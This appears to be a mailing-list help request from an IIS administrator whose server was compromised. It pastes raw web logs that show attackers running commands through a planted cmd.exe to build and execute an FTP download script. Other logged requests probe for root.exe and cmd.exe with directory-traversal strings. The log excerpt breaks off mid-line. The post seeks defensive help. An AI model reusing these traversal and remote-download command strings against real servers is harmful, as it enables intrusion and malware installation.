Help,   I recently found this on my IIS server after being contacted
that my webserver attempted to scan someone's machine on port 80.  I've
looked on my web box and found the following files were installed
msxc32.exe which seems to be Mirc program which is some type of chat
program.  I've talked to other techs here who have not installed this
program.  I've traced the following ip addresses back to the domain
admins but before I contact I need to know if this is the intruder's ip
address and what would be the best course of action. On the flip side
what do I need to do to prevent this from happening in the future?  I
have since blocked these addresses but this is only a temp fix.

18:56:21 156.63.205.48 GET
/iisadmpwd/fuck.exe?/c+echo+get+shouldNT32.ocx+c:shouldNT32.ocx>>xl32.scr
502
18:56:23 156.63.205.2 GET
/iisadmpwd/fuck.exe?/c+echo+get+shtlng32.dll+c:shtlng32.dll>>xl32.scr 502
18:56:25 156.63.205.48 GET
/iisadmpwd/fuck.exe?/c+echo+get+smba.dll+c:smba.dll>>xl32.scr 502
18:56:27 156.63.205.2 GET
/iisadmpwd/fuck.exe?/c+echo+get+sndrec32.dl_+c:sndrec32.dl_>>xl32.scr 502
18:56:33 156.63.205.48 GET
/iisadmpwd/fuck.exe?/c+echo+get+thds32.exe+c:thds32.exe>>xl32.scr 502
18:56:35 156.63.205.2 GET
/iisadmpwd/fuck.exe?/c+echo+get+winsd32.ocx+c:winsd32.ocx>>xl32.scr 502
18:56:37 156.63.205.48 GET
/iisadmpwd/fuck.exe?/c+echo+get+holes.txt+c:holes.txt>>xl32.scr 502
18:56:39 156.63.205.47 GET /iisadmpwd/fuck.exe?/c+echo+bye>>xl32.scr 502
18:56:54 156.63.205.2 GET /iisadmpwd/fuck.exe?/c+ftp+-s:xl32.scr+-n+-d 502
20:20:36 216.158.145.245 GET /scripts/root.exe?/c+dir 404
20:20:36 216.158.145.245 GET /MSADC/root.exe?/c+dir 404
20:20:36 216.158.145.245 GET /c/winnt/system32/cmd.exe?/c+dir 404
20:20:36 216.158.145.245 GET /d/winnt/system32/cmd.exe?/c+dir 404
20:20:36 216.158.145.245 GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir 404
20:20:36 216.158.145.245 GET



Reply via email to